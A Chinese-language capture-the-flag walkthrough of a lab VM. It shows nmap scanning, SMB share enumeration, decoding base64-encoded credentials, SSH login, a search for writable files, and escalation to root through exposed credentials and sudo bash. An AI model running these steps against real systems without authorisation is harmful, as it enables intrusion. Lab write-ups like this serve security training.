靶机下载:
一、信息收集
主机发现
nmap -sn 192.168.10.0/24
常规端口扫描
nmap --min-rate 10000 -p- 192.168.1.9
tcp端口扫描
nmap -sT -sC -sV -O -p22,139,80,443 192.168.1.9
这里发现各个端口开启的服务,我们先记录下来
udp扫描
nmap -sU 192.168.1.9
记录下来
二、漏洞利用
这时候我们发现目标主机开启了ssh ,samba,apche服务,按照优先级应该是samba>apche>ssh,我们首先看samba。
我们使用smbmap,扫描的SMB服务器的IP地址或主机名。-H选项用于指定要扫描的SMB服务器的IP地址或主机名。
smbmap -H 192.168.1.9
我们用smbclient访问并进入wave文件夹里
smbclient //192.168.1.9/wave
发现有两个文件,我们下载并查看两个文件
smb: \> prompt
smb: \> mget *.txt
提示你: aveng丢失了wave用户的密码,希望我们能帮忙找回或者重置
另一个文件,里面写了一个标准的base64编码,我们接下来的思路就是对其解码看能获得什么有用处的信息
三、密码破解
破解密码:
echo RmxhZzF7V2VsY29tZV9UMF9USEUtVzNTVC1XMUxELUIwcmRlcn0KdXNlcjp3YXZleApwYXNzd29yZDpkb29yK29wZW4K | base64 -d
base64属于可逆向编码,按照制表符逆向即可破解,不需要跑字典枚举。
我们这时候已经获得了wavex用户的账号密码,接下来登入账户。
四、提权
登陆账户
ssh wavex@192.168.1.9
寻找可写文件
find / -writable -type f ! -path '/proc/*' 2>/dev/null
这个命令是在Linux系统中用来查找所有可写的文件的。具体来说,它会在根目录下递归查找所有可写的文件,但是会排除掉 /proc/
目录下的文件。其中 -type -f
表示查找的是文件类型,! -path '/proc/*'
表示排除掉 /proc/
目录下的文件,2>/dev/null
表示将错误输出重定向到空设备,以避免输出不必要的错误信息。这个命令在横向移动时可以用来查找可写的文件
我们查看这个文件
wavex@WestWild:~$ cat /usr/share/av/westsidesecret/ififoregt.sh
已经暴露出另一个用户的账号密码
我们登陆进去
sudo /bin/bash
成功获得管理员权限。
打上胜利的标识,宣告胜利。